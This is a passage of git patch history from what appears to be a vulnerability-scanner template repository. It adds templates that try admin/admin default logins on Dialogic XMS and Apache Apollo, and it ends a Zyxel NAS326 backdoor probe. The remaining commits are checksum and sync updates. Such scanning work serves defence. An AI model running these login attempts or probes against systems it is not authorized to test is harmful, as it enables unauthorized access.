+ product: nas326_firmware + fofa-query: app="ZYXEL-NAS326" + tags: cve,cve2024,zyxel,backdoor + +http: + - raw: + - | + GET /desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains(body, 'result=0')" + condition: and From 3360ec1927a5f6c2d9b6fa1780334461a3fef256 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Jul 2024 09:35:05 +0530 Subject: [PATCH 0731/1841] Delete http/takeovers/vercel-takeover.yaml --- http/takeovers/vercel-takeover.yaml | 32 ----------------------------- 1 file changed, 32 deletions(-) delete mode 100644 http/takeovers/vercel-takeover.yaml diff --git a/http/takeovers/vercel-takeover.yaml b/http/takeovers/vercel-takeover.yaml deleted file mode 100644 index 432acd192a..0000000000 --- a/http/takeovers/vercel-takeover.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: vercel-takeover - -info: - name: Vercel Takeover Detection - author: brianlam38 - severity: high - description: Vercel takeover was detected. - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz/pull/375 - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/183 - metadata: - verified: true - max-request: 1 - shodan-query: html:"The deployment could not be found on Vercel" - tags: takeover,vercel - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: dsl - dsl: - - Host != ip - - - type: word - part: body - words: - - "The deployment could not be found on Vercel" -# digest: 4a0a00473045022100e9c2a259ba4561334fd4151612f11c27bfbf48680673b341eff2ff5bdefaf4d502206f94af7c8b41af543a3a1fee972d294859b0b1dae336394ad15d4f9d8366bcb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a4dd4a428dcdab5ff1b1d4fa98bcc8ef8fc8c118 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 1 Jul 2024 11:01:36 +0530 Subject: [PATCH 0732/1841] Create dialogic-xms-default-login.yaml --- .../dialogic-xms-default-login.yaml | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/default-logins/dialogic-xms-default-login.yaml diff --git a/http/default-logins/dialogic-xms-default-login.yaml b/http/default-logins/dialogic-xms-default-login.yaml new file mode 100644 index 0000000000..6c843f01a0 --- /dev/null +++ b/http/default-logins/dialogic-xms-default-login.yaml @@ -0,0 +1,42 @@ +id: dialogic-xms-default-login + +info: + name: Dialogic XMS Admin Console - Default Login + author: ritikchaddha + severity: high + metadata: + verified: true + max-request: 1 + shodan-query: title:"Dialogic XMS Admin Console" + tags: dialogic,admin,default-login,misconfig + +http: + - raw: + - | + POST /index.php/verifyLogin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + usernameId={{username}}&passwordId={{password}} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'DialogicDojo' + - 'userId">user:' + - 'var downloads' + - 'onclick="logout' + condition: and + + - type: status + status: + - 200 From 28150173a3ed44aa03a90e0cbdb66ac57fb3178f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 1 Jul 2024 11:02:26 +0530 Subject: [PATCH 0733/1841] Create dialogic-xms-console.yaml --- http/exposed-panels/dialogic-xms-console.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/exposed-panels/dialogic-xms-console.yaml diff --git a/http/exposed-panels/dialogic-xms-console.yaml b/http/exposed-panels/dialogic-xms-console.yaml new file mode 100644 index 0000000000..480d119235 --- /dev/null +++ b/http/exposed-panels/dialogic-xms-console.yaml @@ -0,0 +1,27 @@ +id: dialogic-xms-console + +info: + name: Dialogic XMS Admin Console - Detect + author: ritikchaddha + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: title:"Dialogic XMS Admin Console" + tags: panel,dialogic,admin,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Dialogic XMS Admin Console' + + - type: status + status: + - 200 From eff3c1eb8e1c8b5a0b430418285d3ba77533d0bc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 1 Jul 2024 11:03:00 +0530 Subject: [PATCH 0734/1841] Create apache-apollo-default-login.yaml --- .../apache/apache-apollo-default-login.yaml | 47 +++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/default-logins/apache/apache-apollo-default-login.yaml diff --git a/http/default-logins/apache/apache-apollo-default-login.yaml b/http/default-logins/apache/apache-apollo-default-login.yaml new file mode 100644 index 0000000000..36a3d9b46a --- /dev/null +++ b/http/default-logins/apache/apache-apollo-default-login.yaml @@ -0,0 +1,47 @@ +id: apache-apollo-default-login + +info: + name: Apache Apollo - Default Login + author: ritikchaddha + severity: high + metadata: + verified: true + max-request: 1 + shodan-query: title:"Apache Apollo" + tags: apache,apollo,default-login,misconfig + +variables: + username: 'admin' + password: 'admin' + +http: + - raw: + - | + POST /api/json/session/signin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + username={{username}}&password={{password}} + + - | + GET /console/index.html HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body_1 + regex: + - '^\s*true\s*$' + + - type: word + part: body_2 + words: + - 'Log Details:' + - 'Store Status' + - 'Logout' + condition: and + + - type: status + status: + - 200 From e2aeddad1d1676e32f225d1841fae160703e6b88 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 1 Jul 2024 11:03:19 +0530 Subject: [PATCH 0735/1841] Create apache-apollo-panel.yaml --- .../apache/apache-apollo-panel.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/exposed-panels/apache/apache-apollo-panel.yaml diff --git a/http/exposed-panels/apache/apache-apollo-panel.yaml b/http/exposed-panels/apache/apache-apollo-panel.yaml new file mode 100644 index 0000000000..a715aca0d5 --- /dev/null +++ b/http/exposed-panels/apache/apache-apollo-panel.yaml @@ -0,0 +1,27 @@ +id: apache-apollo-panel + +info: + name: Apache Apollo Panel - Detect + author: ritikchaddha + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: title:"Apache Apollo" + tags: panel,apache,apollo,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/console/index.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Apache Apollo - Admin Console' + + - type: status + status: + - 200 From a303a9d8cb5d5be7c4731b9bea4581ba063a73f1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 1 Jul 2024 11:06:53 +0530 Subject: [PATCH 0736/1841] Create chaty.yaml --- helpers/wordpress/plugins/chaty.yaml | 1 + 1 file changed, 1 insertion(+) create mode 100644 helpers/wordpress/plugins/chaty.yaml diff --git a/helpers/wordpress/plugins/chaty.yaml b/helpers/wordpress/plugins/chaty.yaml new file mode 100644 index 0000000000..34cde5690e --- /dev/null +++ b/helpers/wordpress/plugins/chaty.yaml @@ -0,0 +1 @@ +3.2.6 From 8fd8b8cf970a93f77acea9b8cd6e8c4b5e2d73e7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 05:39:44 +0000 Subject: [PATCH 0737/1841] Auto Generated New Template Addition List [Mon Jul 1 05:39:44 UTC 2024] :robot: --- .new-additions | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/.new-additions b/.new-additions index 295ea2d378..a8f4d10b84 100644 --- a/.new-additions +++ b/.new-additions @@ -1,12 +1,20 @@ +helpers/wordpress/plugins/chaty.yaml http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-34102.yaml http/cves/2024/CVE-2024-37152.yaml http/cves/2024/CVE-2024-37881.yaml http/cves/2024/CVE-2024-6028.yaml +http/default-logins/caprover/caprover-default-login.yaml +http/default-logins/jeedom/jeedom-default-login.yaml +http/exposures/configs/filestash-admin-config.yaml http/exposures/configs/neo4j-neodash-config.yaml +http/misconfiguration/forgejo-repo-exposure.yaml http/misconfiguration/installer/kodbox-installer.yaml +http/misconfiguration/installer/piwigo-installer.yaml +http/misconfiguration/installer/poste-io-installer.yaml http/technologies/neo4j-neodash-detect.yaml +http/technologies/wordpress/plugins/chaty.yaml http/vulnerabilities/backdoor/polyfill-backdoor.yaml http/vulnerabilities/next-js-cache-poisoning.yaml http/vulnerabilities/other/bagisto-csti.yaml From bfdc5275b7808bc3afaffb30674bd6577f8f0fdd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 05:39:51 +0000 Subject: [PATCH 0738/1841] Auto Generated Templates Checksum [Mon Jul 1 05:39:51 UTC 2024] :robot: --- templates-checksum.txt | 26 +++++++++++++++++--------- 1 file changed, 17 insertions(+), 9 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 145f189763..94432558f1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -748,9 +748,10 @@ helpers/wordpress/plugins/backwpup.txt:36442478f1f952d62cb89e1b634d5937a7d2863f helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/better-wp-security.txt:3fe0b3c91b9dd2a6f57c0d1e7ec7c05ac3858661 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 -helpers/wordpress/plugins/breadcrumb-navxt.txt:8470da5c818e6dc68d623fea21c1b507e075b906 +helpers/wordpress/plugins/breadcrumb-navxt.txt:2993934f31a10ddda5a7fb5e979600aa8bc7d69d helpers/wordpress/plugins/breeze.txt:12c708130d75c9e7150d0af82c0b82b66c6c85e0 helpers/wordpress/plugins/broken-link-checker.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb +helpers/wordpress/plugins/chaty.yaml:22603432911b0496f708ee79d4b1177c5263be32 helpers/wordpress/plugins/child-theme-configurator.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 @@ -831,7 +832,7 @@ helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:3996adb4a5baf85b2309 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:3a108f8e498bd0c9790af41f7f7d8093515044ff helpers/wordpress/plugins/loco-translate.txt:0aa5278ef5ea1dbf030f22ea213474a6ac406d64 -helpers/wordpress/plugins/loginizer.txt:58d1d0c23163c61557bea4063c882aa0813ce1fa +helpers/wordpress/plugins/loginizer.txt:83057b5c2ba4158be4c360919fba39e92c0cd3ca helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:0ef6ca3504757e440dbb7f74dfc7956540130d09 @@ -882,9 +883,9 @@ helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746 helpers/wordpress/plugins/simple-history.txt:2f4af87dfd67a2385a4e30cfbd4d57d669853135 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd helpers/wordpress/plugins/siteguard.txt:92c6bf6bc1f97136cb8bbe1a936cc4289dff178e -helpers/wordpress/plugins/siteorigin-panels.txt:f522f67ac832d3968e5b0a47580f0ac715e89f4b +helpers/wordpress/plugins/siteorigin-panels.txt:95d3da7ccba2614dea34b493903fa307600e3a01 helpers/wordpress/plugins/smart-slider-3.txt:ddd091c3f02b8a56a7a2d9a4a0f8387a12a347f9 -helpers/wordpress/plugins/so-widgets-bundle.txt:222da8dca74c58580fd6817da4aef16582951efe +helpers/wordpress/plugins/so-widgets-bundle.txt:6d445f8f926ce0b81a2d46eb8ce60af388326266 helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt:a1231facbb4b8314300cb531105cd765f90c95f1 helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:3e2cb2d1f1740c5f32e24ad2ae43138ffd391c84 @@ -932,12 +933,12 @@ helpers/wordpress/plugins/wp-mail-smtp.txt:9a0a06f6eb18bf496057acce15162dc100f43 helpers/wordpress/plugins/wp-maintenance-mode.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/wp-migrate-db.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd -helpers/wordpress/plugins/wp-optimize.txt:1ee09476b338ca8261ad83be6aefa18693436588 +helpers/wordpress/plugins/wp-optimize.txt:42aae5955584904bc2d13eabc3cf07107b276398 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f helpers/wordpress/plugins/wp-reset.txt:0676d107698477ab3fa1a4f94a324657de0f87fd helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:d8c3854ca34a77499c02ddb33eac42b322bb70cb helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7c2 -helpers/wordpress/plugins/wp-seopress.txt:60d712d9a12f5416daabb3565821281c3cba1d4c +helpers/wordpress/plugins/wp-seopress.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c helpers/wordpress/plugins/wp-statistics.txt:eaf1c1bdfba4abe49a572dfe88b7618f7fedd9f4 @@ -3502,6 +3503,7 @@ http/default-logins/bloofoxcms-default-login.yaml:521262f1b70cf41dabf50e7022c8d6 http/default-logins/caimore/caimore-default-login.yaml:fa6dc9fbfefd35cbe6b0122cbe2063f51286d122 http/default-logins/cambium-networks/cambium-networks-default-login.yaml:928052d49de95f8d8b897803364418aca8270c23 http/default-logins/camunda/camunda-default-login.yaml:e0ba275d0aeadc4a4e0df5010277d2db9e6329e7 +http/default-logins/caprover/caprover-default-login.yaml:3d03d884e8588228a1fb02dc81ec83b17f28aee7 http/default-logins/chinaunicom/chinaunicom-default-login.yaml:825cceb7abec9ba21938e316e8748da23c72c82a http/default-logins/cobbler/cobbler-default-login.yaml:2994d59f748f3b084644bb25989f6ecc8ea81a2a http/default-logins/cobbler/hue-default-credential.yaml:810629da57236ea925fc51305d98564392a5b017 @@ -3556,6 +3558,7 @@ http/default-logins/iptime/iptime-default-login.yaml:48f3d34ec32b4e732a8ba25d4a8 http/default-logins/ispconfig-default-login.yaml:2126a9ba475f54484184cd47bc03e677eecfa543 http/default-logins/jboss/jboss-jbpm-default-login.yaml:fd2387ad05ebe5855e3dfb79602c5226b585c458 http/default-logins/jboss/jmx-default-login.yaml:7225145aa06029dd8dc5652950f7fdbae7d4b39a +http/default-logins/jeedom/jeedom-default-login.yaml:7c17fa59a0da80abc35acc3d7d79c4708028d958 http/default-logins/jenkins/jenkins-default.yaml:bf1375ede015990a06127d5242c7c7c02a529da7 http/default-logins/jinher/jinher-oa-default-login.yaml:73afa499ea62035643ff5c59540428230c5ee4f7 http/default-logins/jupyterhub/jupyterhub-default-login.yaml:c0c1b860e3aed49ba84b96b2ad652b954773c684 @@ -4840,6 +4843,7 @@ http/exposures/configs/exposed-hg.yaml:a88625c10530e2d9a7717cd4a2d4b0f7f35ab167 http/exposures/configs/exposed-sharepoint-list.yaml:912d3a0311062208cd6cc6d92a9b6456c2f653d2 http/exposures/configs/exposed-svn.yaml:9fb8eb671ef20a0114ce31a5db568992528d85ae http/exposures/configs/exposed-vscode.yaml:dbcb3ed67d0dff4e71076924fb318d2a5a7614f9 +http/exposures/configs/filestash-admin-config.yaml:ba80e0499499c4f049c4d55b4359b5178d38250a http/exposures/configs/firebase-config-exposure.yaml:3fb8f306a1cc3f5741eb0ba1275d557471ce16ae http/exposures/configs/ftp-credentials-exposure.yaml:378fc0c5562138a94812d60c0f3d45cd054704da http/exposures/configs/gcloud-config-default.yaml:91ae35f1db1a63605f03aebdda8ed421a6c3d557 @@ -5518,6 +5522,7 @@ http/misconfiguration/express-stack-trace.yaml:5d6a09415331603b6718bb7b766f90606 http/misconfiguration/feiyuxing-info-leak.yaml:8283a5c83d32a5290bfb243fa629e47e8aecdadf http/misconfiguration/filebrowser-unauth.yaml:a888d5a22057e6a9bad36d051b74f2092ccc61ff http/misconfiguration/flask-redis-docker.yaml:884961c3e4b03b5cff631eae034ce3add285e676 +http/misconfiguration/forgejo-repo-exposure.yaml:84e1491ac158e36e3adac354949de9b579545d21 http/misconfiguration/formalms-install.yaml:c81cf4919398991aef477d82b3ff17742f7d2280 http/misconfiguration/front-page-misconfig.yaml:43a1c8208f0ac3863a17fa06b8fe9c014fbf8a6a http/misconfiguration/fusionauth-admin-setup.yaml:a0bcf30e5ef642af46bb01a7135a26c24d894dfc @@ -5628,7 +5633,7 @@ http/misconfiguration/installer/joomla-installer.yaml:3c61ec0cf21b65088e1392f2f5 http/misconfiguration/installer/justfans-installer.yaml:a0589926d5a3ca938dd300000c6e260ba8ffe7f2 http/misconfiguration/installer/klr300n-installer.yaml:417ba88bb2ce1a6aced0dfacfa77021a62f73487 http/misconfiguration/installer/knowledgetree-installer.yaml:f4e36b69f4f577a4a5b76c60fd0ce3f47b33fe27 -http/misconfiguration/installer/kodbox-installer.yaml:2ba402298590e00f0a071cd6796ce05bc0c4f930 +http/misconfiguration/installer/kodbox-installer.yaml:f7dced923d74384e9c763cffb64dbfc467104418 http/misconfiguration/installer/librenms-installer.yaml:918045c9f38e3d800119f1c8a2c2062a47a20509 http/misconfiguration/installer/limesurvey-installer.yaml:8c8e0b95f4dbcb24a9da331230c2cb9333bf0e0b http/misconfiguration/installer/lmszai-installer.yaml:afa8a8a67c2b987480677086d4d970b59fc1d35f @@ -5671,8 +5676,10 @@ http/misconfiguration/installer/phpgedview-installer.yaml:c3abf51106828355409764 http/misconfiguration/installer/phpipam-installer.yaml:fd13b9a8528ac804f19dea5ffb775e82aa01b87d http/misconfiguration/installer/phpmyfaq-installer.yaml:d21e8a4ea781328f94303a5d1ac610abb96a19a6 http/misconfiguration/installer/phpwind-installer.yaml:382bd97db9268ea3922f6ea937ef2d07a77c0cf0 +http/misconfiguration/installer/piwigo-installer.yaml:545259e01f02d7c7a705e1fc31771e50f75e991c http/misconfiguration/installer/piwik-installer.yaml:13b6e4cc5e4a106ac91c0f984089a3465a67af49 http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40b3f1c065e91 +http/misconfiguration/installer/poste-io-installer.yaml:361b3e51cc8bdad9878c5839f3ecd23ef919fd1f http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5 http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24 @@ -7243,6 +7250,7 @@ http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae787 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 @@ -7313,7 +7321,7 @@ http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bb http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 -http/technologies/wordpress/plugins/iwp-client.yaml:b435ab5520345df3f78f16697923cb8b5e529692 +http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a @@ -8801,7 +8809,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:63ad414f737c58be64b6e194d0efe04233e0c58a +templates-checksum.txt:2c839edde04a1ccf82c7ecaf156643f98a7de0a7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e2b1fce843056e5a9008a5d23e5de829bfd43a39 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 05:40:38 +0000 Subject: [PATCH 0739/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 811e597d1a..4bd65367af 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,15 +3,23 @@ on: push: paths: - '.new-additions' + - 'helpers/wordpress/plugins/chaty.yaml' - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' - 'http/cves/2024/CVE-2024-37152.yaml' - 'http/cves/2024/CVE-2024-37881.yaml' - 'http/cves/2024/CVE-2024-6028.yaml' + - 'http/default-logins/caprover/caprover-default-login.yaml' + - 'http/default-logins/jeedom/jeedom-default-login.yaml' + - 'http/exposures/configs/filestash-admin-config.yaml' - 'http/exposures/configs/neo4j-neodash-config.yaml' + - 'http/misconfiguration/forgejo-repo-exposure.yaml' - 'http/misconfiguration/installer/kodbox-installer.yaml' + - 'http/misconfiguration/installer/piwigo-installer.yaml' + - 'http/misconfiguration/installer/poste-io-installer.yaml' - 'http/technologies/neo4j-neodash-detect.yaml' + - 'http/technologies/wordpress/plugins/chaty.yaml' - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' - 'http/vulnerabilities/next-js-cache-poisoning.yaml' - 'http/vulnerabilities/other/bagisto-csti.yaml' From 060c2741cf98fdac9aafb37ff60dfe013c87c1c6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 05:41:36 +0000 Subject: [PATCH 0740/1841] Auto Template Signing [Mon Jul 1 05:41:36 UTC 2024] :robot: --- http/default-logins/caprover/caprover-default-login.yaml | 1 + http/default-logins/jeedom/jeedom-default-login.yaml | 1 + http/exposures/configs/filestash-admin-config.yaml | 1 + http/misconfiguration/forgejo-repo-exposure.yaml | 1 + http/misconfiguration/installer/piwigo-installer.yaml | 1 + http/misconfiguration/installer/poste-io-installer.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 